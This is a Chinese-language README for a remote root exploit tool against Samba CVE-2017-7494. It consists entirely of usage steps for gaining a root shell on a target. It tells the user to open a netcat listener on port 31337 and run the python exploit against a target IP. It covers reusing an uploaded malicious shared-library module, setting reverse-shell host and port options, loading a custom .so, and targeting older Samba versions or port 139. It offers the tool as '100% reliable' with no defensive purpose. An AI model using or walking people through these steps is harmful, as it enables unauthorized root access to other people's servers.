针对SAMBA CVE-2017-7494漏洞的远程root利用工具。
本利用工具分为两部分:
只要目标存在漏洞,且有效载荷与目标操作系统及架构匹配,该利用工具就100%可靠。
在你的机器上运行以下命令:
$ nc -p 31337 -l
然后,针对你的目标运行该利用工具,等待其连接回你的Netcat:
$ python cve_2017_7494.py -t target_ip
如果你过快关闭反向Shell,无需重新运行利用工具上传模块等操作,你可以直接传递已上传模块的路径。假设它已上传到 /shared/directory/ 并命名为 "module.so",你可以运行类似下面的命令:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
现在你可以针对samba 3.5.0和3.6.0版本运行该利用工具,只需添加参数 -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
你现在可以使用你自己的自定义.so文件
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
如果你需要在x86机器上运行此脚本,编译implant二进制文件将生成两个x86文件。使用标志 -n 1 可以禁用编译,并从另一台机器复制 libimplantx64.so。
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
如果samba仅在139端口运行,你可以使用参数 -p 设置远程服务器端口
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
我不再支持它了。
-- Joxean Koret